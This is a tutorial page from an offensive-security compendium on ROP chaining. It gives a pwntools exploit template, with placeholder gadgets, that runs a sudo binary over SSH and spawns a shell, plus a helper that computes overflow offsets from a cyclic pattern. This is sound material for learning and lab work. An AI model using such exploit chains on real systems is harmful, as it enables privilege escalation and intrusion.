killchain-compendium/exploit/binaries/buffer_overflow/ropping.md


# ROP Chaining
## Usage
* Find the offset to the saved return address with a cyclic pattern (`cyclic` / `cyclic_find`)
* Find gadgets via `ropper` or, even better, `ropstar`
## Example
```python
from pwn import *

# connect to the target over SSH and start the vulnerable binary there
s = ssh(host="$TARGET_IP", user="<user>", keyfile="", password="")
p = s.process(['sudo', '<process>'])

# offset from the start of the buffer to the saved return address
offset = <found_offset_len>

# padding up to the return address, then the ROP chain taken from ropstar
payload = cyclic(offset)
payload += p64(0x4711)   # gadget / address 1 (placeholder value)
payload += p64(0x235)    # gadget / address 2 (placeholder value)
payload += p64(0x007)    # gadget / address 3 (placeholder value)

print(p.recv())
p.sendline(payload)
print(p.recv())
p.sendline(b"/bin/sh")   # pwntools on Python 3 expects bytes here
p.interactive(prompt='')
```
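The first usage step, finding the offset from a crash produced by a cyclic pattern, as an added stand-alone example that is not part of the compendium and does not need pwntools: it regenerates the same de Bruijn pattern pwntools uses (alphabet `a-z`, 4-byte windows), so the offset it reports for a register value or stack bytes matches `cyclic_find`. The names `de_bruijn`, `cyclic` and `cyclic_find` are this example's own.

```python
"""Offset triage for a crash caused by a cyclic (de Bruijn) pattern.

Re-implements pwntools' cyclic()/cyclic_find() with the same defaults so the
offset found here is the one to plug into `offset = ...` in the script above.
"""
import string

ALPHABET = string.ascii_lowercase  # pwntools' default alphabet
N = 4                              # every 4-byte window of the pattern is unique


def de_bruijn(alphabet: str = ALPHABET, n: int = N) -> str:
    """Return the full de Bruijn sequence B(k, n) over `alphabet` (k^n chars)."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def step(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
            return
        a[t] = a[t - p]
        step(t + 1, p)
        for j in range(a[t - p] + 1, k):
            a[t] = j
            step(t + 1, t)

    step(1, 1)
    return "".join(alphabet[i] for i in out)


_SEQUENCE = de_bruijn()  # about 457 KB, generated once and reused


def cyclic(length: int) -> bytes:
    """First `length` bytes of the pattern, as pwntools' cyclic() returns them."""
    return _SEQUENCE[:length].encode()


def cyclic_find(value) -> int:
    """Offset of `value` inside the pattern, or -1 if it is not part of it.

    `value` is either the raw bytes read from the stack at the crash or an int
    copied from a register dump; an int is decoded little-endian as on x86-64.
    """
    if isinstance(value, int):
        value = value.to_bytes(8, "little").rstrip(b"\x00")
    if isinstance(value, bytes):
        value = value.decode("ascii", errors="replace")
    if len(value) < N:           # fewer than 4 bytes cannot identify a position
        return -1
    return _SEQUENCE.find(value[:N])
```

A register holding `0x6161616c` ("laaa" in memory) resolves to offset 44, the classic result for a 4-byte window.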